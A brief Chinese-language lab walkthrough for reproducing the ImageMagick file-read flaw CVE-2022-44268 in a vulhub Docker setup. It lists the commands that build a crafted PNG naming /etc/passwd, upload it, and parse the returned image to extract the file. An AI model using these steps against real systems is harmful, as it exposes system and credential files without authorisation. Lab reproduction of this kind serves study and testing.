环境搭建
vulhub一键搭建
cd vulhub/imagemagick/CVE-2022-44268
docker-compose up -d
服务启动后,访问http://ip:8080可以看到图片上传框
漏洞复现
vulhub有自带的poc
在使用poc前,需要pip install pypng安装python包
然后使用poc生成恶意图片
chmod 777 poc.py
./poc.py generate -o poc.png -r /etc/passwd
然后将生成的图片poc.png上传
再将网页中生成的图片下载下来,命名为out.png
最后使用poc.py对这个图片进行读取,就能读到/etc/passwd的内容了
./poc.py parse -i out.png